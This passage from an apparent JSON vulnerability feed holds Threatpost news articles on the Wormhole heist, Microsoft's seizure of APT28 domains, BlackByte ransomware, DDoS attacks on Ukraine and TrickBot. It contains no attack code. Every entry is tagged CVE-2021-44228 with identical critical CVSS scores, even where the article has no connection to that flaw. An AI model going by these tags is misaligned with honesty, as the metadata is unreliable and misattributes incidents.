it\u2019s tough to claw it back. \u201cThe exploits always result in stolen money, which are hard to track to and [identify], and almost always impossible to reverse, even if you are watching it in real time,\u201d Grimes said.\n\nHe predicted that after suffering billions of dollars in pain, the cryptocurrency world \u201cwill mature and it will become harder for hackers to find the easy pickings.\u201d\n\nToo bad the lessons are so painful, Grimes said: \u201cYou always hope that when the next cool digital thing happens that we will better apply the security lessons learned from the previous platforms. But we always seem to want there to be more digital blood on the ground than there needs to be. We always, over and over, want to learn the hard way. Each new computing platform is like we have learned nothing at all.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-03T18:28:14", "type": "threatpost", "title": "Wormhole Crypto Platform: 'Funds Are Safe' After $314M Heist", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-03T18:28:14", "id": "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "href": "https://threatpost.com/wormhole-crypto-funds-safe-heist/178189/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-11T17:46:34", "description": "Microsoft seized seven domains it claims were part of ongoing cyberattacks by what it said are state-sponsored Russian advanced persistent threat actors that targeted Ukrainian-related digital assets.\n\nThe company obtained court orders to take control of the domains it said were used by Strontium, also known as APT28, Sofacy, Fancy Bear and Sednit. [In a blog post outlining the actions](<https://blogs.microsoft.com/on-the-issues/2022/04/07/cyberattacks-ukraine-strontium-russia/>), Microsoft reported attackers used the domains to target Ukrainian media organizations, government institutions and foreign policy think tanks based in the U.S. and Europe.\n\n\u201cWe obtained a court order authorizing us to take control of seven internet domains Strontium was using to conduct these attacks,\u201d said Tom Burt, corporate vice president of Customer Security and Trust at Microsoft.\n\nSinkhole is a security term that refers to the redirection of internet traffic from domains, at the domain-server network level, by security researchers for analysis and mitigation. Microsoft did not specify how the domains were specifically being abused, beyond identifying those targeted.\n\n\u201cWe have since re-directed these domains to a sinkhole controlled by Microsoft, enabling us to mitigate Strontium\u2019s current use of these domains and enable victim notifications,\u201d Burt said.\n\nResearchers, said the APT was attempting to establish persistent, or long-term, access to a target\u2019s system. This, they suggested, would facilitate a second stage attack that would likely include extraction of sensitive information such as credentials.\n\n\u201cThis disruption is part of ongoing long-term investment, started in 2016, to take legal and technical action to seize infrastructure being used by Strontium. We have established a legal process that enables us to obtain rapid court decisions for this work,\u201d Microsoft said.\n\n## **Sinkhole History**\n\nPrior to this, Microsoft seized 91 malicious domains as part of 15 separate court orders against what it asserts are Russian-language threat groups, [dating back to August 2014](<https://threatpost.com/latest-microsoft-malware-takedown-causes-waves-in-security-community/106939/>).\n\nThe use of going through the courts to obtain a temporary restraining order against those identified as behind the malicious domains has been the main method that Microsoft has used to disrupt malicious campaigns. The court order shuts down the malicious activity and gives Microsoft the legal authority to reroute traffic to domains Microsoft controls.\n\nSinkholes are a time-tested and accepted method for disrupting the operation of botnets and other malware enterprises and are used in a variety of ways. Researchers often will work with hosting providers to reroute traffic from malicious domains to ones controlled by the researchers or by law enforcement, helping to cut off the lifeline of the criminal operations and allow for a forensic analysis of traffic used to establish the source, nature and scope of an attack.\n\nIn the case of APT28, [in 2016 the Federal Bureau of Investigation and the US Department of Homeland Security](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) implicated the hacking group in attacks against several U.S. election-related targets.\n\nMore recently, Strontium is believed to have teamed up with Belarusian hacking group Ghostwriter to [launch phishing attacks targeting Ukrainian officials](<https://threatpost.com/eu-russia-ghostwriter-germany/175025/>), according to Google. [European satellite services](<https://threatpost.com/agencies-satellite-hacks-gps-jamming-airplanes-critical-infrastructure/178993/>) have also been targeted by unverified threat actors as part of an escalating cyber offensive designed to hurt Ukraine.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/04/11131757/Sagar-Tiwari-150x150.jpg)\n\nReported By: Sagar Tiwari, an independent security researcher and technical writer.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-11T17:26:25", "type": "threatpost", "title": "Microsoft Takedown Domains Used in Cyberattack Against Ukraine", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-11T17:26:25", "id": "THREATPOST:46AF5D5C752ADF689DA52FBDA4644F5D", "href": "https://threatpost.com/microsoft-takedown-domains-ukraine/179257/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T02:13:10", "description": "The San Francisco 49ers were recently kneecapped by a BlackByte ransomware attack that temporarily discombobulated the NFL team\u2019s corporate IT network on the Big Buffalo Wing-Snarfing Day itself: Superbowl Sunday.\n\nBlackByte \u2013 a ransomware-as-a-service (RaaS) gang that leases its ransomware to affiliates who cut it in on a share of ransom profits \u2013 claimed responsibility for the attack by leaking files purportedly stolen in the cyber assault.\n\nThe 49ers confirmed the attack to Threatpost on Monday. The team\u2019s statement:\n\n\u201cWe recently became aware of a network security incident that resulted in temporary disruption to certain systems on our corporate IT network. Upon learning of the incident, we immediately initiated an investigation and took steps to contain the incident.\u201d\n\nThe 49ers brought in third-party cybersecurity firms to assist and notified law enforcement. The team was still investigating as of Monday, but so far, it looks like the intrusion was limited to its corporate IT network and didn\u2019t affect ticket systems or systems at the team\u2019s home base, Levi\u2019s Stadium..\n\n\u201cTo date, we have no indication that this incident involves systems outside of our corporate network, such as those connected to Levi\u2019s Stadium operations or ticket holders,\u201d its statement said. \u201cAs the investigation continues, we are working diligently to restore involved systems as quickly and as safely as possible.\u201d\n\nJoseph Carson, chief security scientist and advisory CISO at provider of privileged access management (PAM) solutions provider Delinea, suggested to Threatpost that it\u2019s likely that an affiliate hacked the 49ers, as opposed to the authors behind the ransomware, given that BlackByte is an RaaS.\n\nBlackByte recently posted some files purportedly stolen from the team on a dark web site in a file marked \u201c2020 Invoices.\u201d The gang hasn\u2019t made its ransom demands public. Nor has the group specified how much data it stole or encrypted.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/14200002/blackbyte-49ers-e1644886822236.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/14200002/blackbyte-49ers-e1644886822236.jpg>)\n\nSource: Ars Technica.\n\nCarson said that the Superbowl timing makes this one a classic case of cyber pests milking a major event: the kind of situation where they can get unsuspecting victims \u201cto click on links, download and execute malicious software or give over their credentials, thinking they are accessing a legitimate internet services, resulting in cybercriminals gaining initial access to networks and services. Once access is compromised, it is only a matter of time before ransomware is deployed.\u201d\n\n## Attack Follows Fast on Heels of Feds\u2019 Warning\n\nThe attack on the 49ers came two days after the FBI and Secret Service jointly announced ([PDF](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUUbpcdscHseLY8WazRItLnvQN0VOFtB523D1IckBDm3GWtAqMavOMkuJNpigwSlS1g-3D-3DHlt-_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74Jad8NDtarbSFgOPpChaB5aAApmeE6Evp0nlfflzt6YSNEz28O2-2FHVrXE7UpGyDfGGnBrtBafeOs6MMZggCxPxBbybJxY4biqI68o3SzC6P2alu5pOZYg8dCtwmTO8AsZdPZl-2FU0cFcl7EEwBgimP9SeuFQXnQpQV9tiXU6qxQF2CVPNMtkNDR2cc1IBMMBK5HJ1DayKvUXhcyXH9vms3utwb-2BVTPSyYRG5jUH2iQhd-2BCWA-3D>)) that BlackByte ransomware has breached the networks of at least three organizations from U.S. critical infrastructure sectors in the last three months.\n\n\u201cAs of November 2021, BlackByte ransomware had compromised multiple US and foreign businesses, including entities in at least three US critical infrastructure sectors (government facilities, financial, and food & agriculture),\u201d the Feds said in a TLP:WHITE joint cybersecurity advisory released on Friday.\n\n## BlackByte\u2019s Back\n\nThe gang [emerged](<https://www.bleepingcomputer.com/forums/t/755181/blackbyte-ransomware-blackbyte-support-topic/>) in July 2021, when it started preying on organizations by exploiting known Microsoft Exchange [vulnerabilities](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) \u2013 such as [ProxyShell](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) \u2013 to claw its way into environments.\n\nIt worked for a while: BlackByte scored wins against manufacturing, healthcare and construction industries in the United States, Europe and Australia. But the gang hit a wall when, months later, Trustwave released a free [decryption tool](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/>) that allowed BlackByte victims to unsnarl their files.\n\nAs Trustwave said in October, the security firm found BlackByte to be a ransomware weirdo, for these reasons:\n\n 1. Same as other notorious ransomware variants like REvil, BlackByte also avoids systems with Russian and ex-USSR languages.\n 2. It has a worm functionality similar to RYUK ransomware.\n 3. It creates a wake-on-LAN magic packet and sends it to the target host \u2013 making sure they are alive when infecting them.\n 4. The author hosted the encryption key in a remote HTTP server and in a hidden file with .PNG extension.\n 5. The author lets the program crash if it fails to download the encryption key.\n 6. The RSA public key embedded in the body is only used once, to encrypt the raw key to display in the ransom note \u2013 that\u2019s it.\n 7. The ransomware uses only one symmetric key to encrypt the files.\n\nAs far as BlackByte\u2019s auction site for selling victims\u2019 data goes, it\u2019s apparently a house of mirrors. While the site claims to contain exfiltrated data from victims, the ransomware itself doesn\u2019t have the ability to exfiltrate data, Trustwave\u2019s Rodel Mendrez and Lloyd Macrohon wrote. \u201cThis claim is probably designed to scare their victims into complying,\u201d they said.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/14203910/BlackBytes-Onion-Site.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/14203910/BlackBytes-Onion-Site.png>)\n\nBlackByte\u2019s Onion site. Source: Trustwave.\n\nAs the Trustwave analysts pointed out in October, the group uses simplistic encryption techniques, using just one symmetric key to encrypt files in AES, as opposed to using unique keys for each session.\n\nBut despite the setback of Trustwave\u2019s decryptor and what experts think of as its simplistic encryption, BlackByte is clearly doing just fine, given the FBI/Secret Service alert on Friday.\n\nMatthew Warner, CTO and co-founder at Blumira, a provider of automated threat detection and response technology, called BlackByte a \u201cgrowing ransomware operator\u201d that\u2019s benefited from following successful patterns implemented by previous groups.\n\n\u201cSimilar to [Conti](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>) ransomware, BlackByte has been identified using Exchange vulnerabilities such as ProxyShell to gain a foothold in environments,\u201d Warner observed to Threatpost on Monday. \u201cAdditionally, BlackByte utilizes well-proven tactics such as Powershell exploitation of obfuscated base64 content to perform all encryption on hosts once exploited.\n\n\u201cIn the end, BlackByte is by no means more sophisticated than other actors in the ransomware universe but rather are the next up-and-coming player to exploit organizations and their data,\u201d Warner added via email.\n\n## Critical Infrastructure\n\nErich Kron, security awareness advocate at KnowBe4, focused on the FBI warning about BlackByte\u2019s success in penetrating the critical infrastructure sector: a sector that\u2019s been \u201cplagued\u201d by ransomware attacks, he said.\n\n\u201cThe criticality of the systems makes quick recovery vital, which increases the likelihood that the victims will pay the ransom,\u201d Kron said in a Monday email. \u201cThis same criticality also makes law enforcement attention much more likely. However, given the low success rate of law enforcement busts, this is often a chance the groups are willing to take.\u201d\n\nKron blamed limited budgets, aging equipment and shortages in cybersecurity staff for making critical infrastructure and many government entities especially vulnerable to ransomware attacks.\n\n\u201cThese groups must focus on the top attack vectors used in ransomware attacks, usually email phishing and attacks on remote access portals,\u201d he advised. \u201cTraining the users to spot and report phishing emails and improving the organizational security culture, along with ensuring remote access portals are monitored for brute force attacks and that credentials being used have Multi-Factor Authentication (MFA) enabled are some top ways to counter these threats.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T02:04:36", "type": "threatpost", "title": "BlackByte Tackles the SF 49ers & US Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T02:04:36", "id": "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "href": "https://threatpost.com/blackbyte-tackles-the-sf-49ers-us-critical-infrastructure/178416/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:54", "description": "On Tuesday, institutions central to Ukraine\u2019s military and economy were hit with a wave of denial-of-service (DoS) attacks, which sparked an avalanche of headlines around the world. The strike itself had limited impact \u2014 but the larger implications for critical infrastructure beyond the Ukraine are worth noting, researchers said.\n\nThe targets were core entities to Ukraine: the Armed Forces of Ukraine, the Ministry of Defense, Oschadbank (the State Savings Bank) and Privatbank, the country\u2019s largest commercial bank, servicing nearly [20 million](<https://en.privatbank.ua/about>) customers. Oschadbank and Privatbank are considered \u201c[systemically important](<https://bank.gov.ua/en/news/all/natsionalniy-bank-onoviv-perelik-sistemno-vajlivih-bankiv>)\u201d to Ukraine\u2019s financial markets.\n\n[![Webinar Promo](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/18102902/keeper_1500x1500-300x300.jpg)](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nAdam Meyers, senior vice president of intelligence at CrowdStrike, said via email that the attacks consisted of \u201ca large volume of traffic, three orders of magnitude more than regularly observed traffic, with 99 percent of this traffic consisting of HTTPs requests.\u201d\n\n## **What Happened?**\n\nBy overloading targeted servers, this kind of DoS attack ensured that end users couldn\u2019t access their websites, bank accounts and so on for a period of time. As Ukraine\u2019s Center for Strategic Communications noted in a Facebook [post](<https://www.facebook.com/StratcomCentreUA/posts/290808713119116>), some Privatbank customers found themselves \u201ccompletely unable to access\u201d the company\u2019s app, while others\u2019 accounts \u201cdo not reflect balance and recent transactions.\u201d\n\nSome customers received SMS messages claiming that ATMs were out of order, according to Ukraine\u2019s Cyberpolice, which [tweeted](<https://twitter.com/CyberpoliceUA/status/1493578811492950020>) the claim. Those reports however were debunked, [according to](<https://www.npr.org/2022/02/15/1080876311/ukraine-hack-denial-of-service-attack-defense>) NPR.\n\nCrucially, the attackers disrupted the _availability _of these websites and services, but not the _integrity _of any data. Thus, the transactions, balances and private information associated with bank accounts and military databases appear to be untainted, according to reports.\n\n[And, according](<https://cip.gov.ua/en/news/shodo-kiberataki-na-saiti-viiskovikh-struktur-ta-derzhavnikh-bankiv>) to Ukraine\u2019s State Special Communications Service, a \u201cworking group of experts\u201d convened yesterday to take \u201call necessary measures to localize and resist the cyberattack.\u201d All affected banking services had resumed by 7:30 p.m. local time on Tuesday, and the websites for the Armed Forces and Ministry of Defense have since been restored.\n\n\u201cThe DDoS attacks against the Ukrainian defense ministry and financial institutions appear to be harassment similar to the previous DDoS attacks [seen in January](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>),\u201d Rick Holland, CISO at Digital Shadows, said via email. \u201cThey could be a precursor to a significant attack or a component of a broader campaign to intimidate and confuse Ukraine.\u201d\n\n## **Part of a Much Broader Campaign**\n\nWhile limited in impact, these events have come mere hours after the Security Service of Ukraine\u2019s (SSU) [reported](<https://ssu.gov.ua/en/novyny/zaiava-sbu-shchodo-proiaviv-hibrydnoi-viiny-v-informatsiinomu-prostori>) a \u201cmassive wave of hybrid warfare\u201d \u2013 [120](<https://ssu.gov.ua/en/novyny/u-sichni-2022-roku-sbu-zablokuvala-ponad-120-kiberatak-na-ukrainski-orhany-vlady>) cyberattacks against government authorities, and a fake news botnet of more than [18,000](<https://ssu.gov.ua/en/novyny/sbu-likviduvala-18ty-tysiachnu-botofermu-u-lvovi-pid-kuratorstvom-rf-siialy-paniku-ta-minuvaly-obiekty-video>) social-media accounts \u2013 all designed to \u201csystemically sow panic, spread fake information and distort the real state of affairs\u201d in the country.\n\nThe SSU attributed this wave of hostile activity to a single unnamed but obvious \u201caggressor state.\u201d\n\nLikewise, Tuesday\u2019s attacks have not been officially attributed. Still, their timing, as Russia mobilizes more than 100,000 troops at Ukraine\u2019s northeast border, is inspiring speculation.\n\n\u201cIt would be no surprise,\u201d wrote Mike McLellan, director of intelligence at SecureWorks, via email, \u201cif it transpires that they are the result of cyberattacks conducted by Russia, or by threat actors with a pro-Russian agenda.\u201d\n\nHe added, \u201cRussia has a history of cyberattacks \u201cdesigned to distract the Ukrainian government and critical infrastructure operators and undermine the trust among the Ukrainian population.\u201d\n\nAnd indeed, in the past two months, Russian- advanced persistent threats (APTs) have been tied to an [attack](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>) on 70 Ukrainian government websites, a [wiper](<https://threatpost.com/destructive-wiper-ukraine/177768/>) targeting government, non-profit and IT organizations, and increased [attacks and espionage](<https://threatpost.com/gamaredon-apt-toolset-ukraine/152568/>) against military targets.\n\nIt\u2019s also worth noting that the 2014 Russian invasion of Crimea [coincided with](<https://resources.infosecinstitute.com/topic/crimea-russian-cyber-strategy-hit-ukraine/>) an outbreak of the [Turla virus](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>), and targeted espionage attacks against government agencies, politicians and businesses.\n\nOthers however noted that there could be many beneficiaries to the fog of potential war.\n\n\u201cWhat could be a more likely scenario [than Russia carrying out the attacks] is that other countries like China and Iran take advantage of the chaos and fog of war to further their interests and conduct their campaigns against the West,\u201d Holland noted. \u201cAs the saying goes, \u2018never let a good crisis go to waste.\u2019 The risk of these types of false-flag operations could have unintended consequences, and you can\u2019t close Pandora\u2019s Box once it\u2019s opened.\u201d\n\nTim Wade, technical director and deputy CTO at Vectra, cautioned against hasty attribution.\n\n\u201cThere are no shortage of actors that could stand to benefit from chaos or disruption \u2013 ranging from criminal actors to nation states \u2013 and that, unlike Hollywood movies, real motivations can be tricky to unwind,\u201d he said via email.\n\n## **Could Ukraine\u2019s Problems Migrate West?**\n\nBesides the direct threat to Ukrainians, increasing cyber-disruption in the region could spill over to affect American and European countries and businesses.\n\nPrior attacks against Ukrainian targets have crippled companies that simply do business or passively interact with Ukrainian organizations. Famously, the 2017 [NotPetya malware](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) that breached a Kiev-based accounting software vendor ended up causing [billions of dollars of damage](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) to multinational corporations like Maersk, Merck and FedEx.\n\nGovernment officials have been warning of the potential for similar attacks directed at the United States government and its critical industries. A January [bulletin](<https://info.publicintelligence.net/DHS-UkraineInvasionCyberAttacks.pdf>) from the Department of Homeland Security (DHS) concluded that \u201cRussia would consider initiating a cyberattack against the Homeland if it perceived a U.S. or NATO response to a possible Russian invasion of Ukraine threatened its long-term national security.\u201d\n\nThe [_DHS and FBI this week also warned_](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUfnCpRAdaEZ-2Fzb6CvhwO2WfCysAcwxa-2FOx6Xho58-2BYfSYyLoJDjBKk191ALVSfQe7tKhtpt14nvCWvRWtjQ5ia-2Bxy-2FAHNuEWnCoDD4HJMf8OJPniUjq-2B73i7hrTuhggh8r40SSt8yAJN6BeVN-2BkmdzRhazj8-2BjAsse8M0ns4vlmM4yK8nCFV0oUzvOT01MzpXw-3D-3DEQ6l_ZRLSPEhX0sWy6v6-2FW4BoBGwvynWnvEEKCCoI2tE2RSv7Ap1BbaYTRGgOsmBtH3N8QKMiyASu9uND9imXoTFn2JxQFydFAQqAST8UQ4mPJ45BLqxiPCRq-2F8g1sIIIifFF67f6vand8CQnio175DMlDx-2BtZjU9X-2BUnk00U6HL2Yt4yyDbwA5dz19QLe0tu0POPLp-2Fgsr5OJD90lYAoTgrjHLrtnapc4YpMEy1t1oB-2FDSc0tf3yxTecOYhCatjqqOm4kJQYHeuGl-2BEr4Nvd1gCZbw27qOfv2B-2BBdgMuXjXMnP622px6wYmsEQxT8XmTUE4Kp48bq-2BYS-2BZ-2BxIiX-2Fk3HtqWfdoiM23ih4UUMDkfkykO0-3D>) of an uptick in Russian scanning of domestic law-enforcement networks and other American targets.\n\nSecurity researchers noted that it\u2019s important to be wary as the geo-political tensions continue \u2014 given that the chaos that would arise from a full-blown Russian incursion would provide plenty of cover for cyberattackers of all stripes.\n\nAs Crowdstrike\u2019s Meyers said, \u201cwhile there is no evidence of any targeting of western entities at this time, there is certainly potential for collateral impact as a result of disruptive or destructive attacks targeting Ukraine \u2013 this could impact companies that have a presence in Ukraine, those that do business with Ukrainian companies, or have a supply chain component in Ukraine such as code development/offshoring.\u201d\n\nWould the U.S. be ready in such a scenario? Last week, DHS officials [_told American cities_](<https://www.usatoday.com/story/news/politics/2022/02/08/local-government-cybersecurity-digital-threats/9208951002/?gnt-cfr=1>) that they were extra-vulnerable to wipers that could result in polluting a water supply or crashing a power grid. And it\u2019s worth noting that, according to [data](<https://www.cyberseek.org/heatmap.html>) from Cyber Seek, 600,000 cybersecurity roles across the nation are currently vacant, meaning that many organizations are understaffed for incident response.\n\n\u201cAre these attacks part of nation-state aggression? Or criminal opportunists exploiting a tense situation? Or just entirely coincidental? While answering with any certainty may be tough, what isn\u2019t difficult is drawing clear line of sight to the significance of cyber-resilience as it relates to critical services and infrastructure,\u201d Vectra\u2019s Wade noted. \u201cToday, everyone operating something of value has a target on their back and we\u2019d all do well to prepare for the inevitability of the consequences of that fact.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T16:04:36", "type": "threatpost", "title": "Ukrainian DDoS Attacks Should Put US on Notice\u2013Researchers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T16:04:36", "id": "THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "href": "https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:40", "description": "Cyberattackers are targeting 60 different high-profile companies with the TrickBot malware, researchers have warned, with many of those in the U.S. The goal is to attack those companies\u2019 customers, according to Check Point Research (CPR), which are being cherry-picked for victimization.\n\nAccording to a Wednesday [CPR writeup](<https://research.checkpoint.com/2022/a-modern-ninja-evasive-trickbot-attacks-customers-of-60-high-profile-companies/>), TrickBot is targeting well-known brands that include Amazon, American Express, JPMorgan Chase, Microsoft, Navy Federal Credit Union, PayPal, RBC, Yahoo and others.\n\n[![Webinar Promo](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/18102902/keeper_1500x1500-300x300.jpg)](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\n\u201cTrickbot attacks high-profile victims to steal the credentials and provide its operators access to the portals with sensitive data where they can cause greater damage,\u201d researchers noted in their report. \n\nOn the technical front, the variant that\u2019s being used in the campaign has also added three interesting modules, and new de-obfuscation and anti-analysis approaches, researchers added.\n\n## **TrickBot\u2019s Back with a New Bag**\n\nThe TrickBot malware was originally a banking trojan, but it has evolved well beyond those humble beginnings to become a wide-ranging credential-stealer and initial-access threat, often responsible for fetching second-stage binaries such as ransomware.\n\nSince the [well-publicized law-enforcement takedown](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>) of its infrastructure in October 2020, the threat has clawed its way back, now sporting more than 20 different modules that can be downloaded and executed on demand. It typically spreads via emails, though the latest campaign adds self-propagation via the EternalRomance vulnerability.\n\n\u201cSuch modules allow the execution of all kinds of malicious activities and pose great danger to the customers of 60 high-profile financial (including cryptocurrency) and technology companies,\u201d CPR researchers warned. \u201cWe see that the malware is very selective in how it chooses its targets.\u201d\n\nIt has also been seen [working in concert](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) with a similar malware, Emotet, which suffered its own [takedown](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) in January 2021.\n\nCPR in just its own telemetry found that TrickBot overall has seen more than 140,000 successful infections since the takedown; and researchers noted that it\u2019s back to taking first place in malware prevalence lists.\n\n## **Fresh Modules for Rotting Infections**\n\nThe version of TrickBot that CPR found being used in the current campaign sports three freshened-up modules of note, researchers said:\n\n * injectDll\n * tabDll\n * pwgrabc\n\n### **TrickBot\u2019s \u2018injectDll\u2019: A Web-Injects Module**\n\nWeb injects are well-known from the banking-trojan world; they are used to present targets with overlaid facsimiles of real banking log-in sites; when a victim tries to sign on, they steal the credential data, and can pave the way for drained bank accounts and fraudulent wire transfers down the road.\n\nThis particular module has added a web-injects format from the [infamous Zeus banking trojan](<https://threatpost.com/trickbot-banking-trojan-module/167521/>), researchers said, which collects information from login actions on targeted sites and sends it to a command-and-control server (C2).\n\n\u201cThe injectDll module performs browser data injection, including JavaScript which targets customers of 60 high-profile companies,\u201d according to the writeup. \u201cAdd Trickbot\u2019s cherry-picking of victims, and the menace becomes even more dangerous.\u201d\n\nOn the anti-analysis front, the payload injected into the banking site\u2019s page is minified (making the code size smaller makes the code unreadable), obfuscated and contains anti-deobfuscation techniques, researchers said. The final payload, which contains the actual code that grabs the victim\u2019s keystrokes and web form submit actions, is also minified and obfuscated and contains a few layers of anti-deobfuscation techniques, they said.\n\n\u201cUsually a researcher tries to analyze minified and obfuscated JavaScript code using tools like JavaScript Beautifiers, 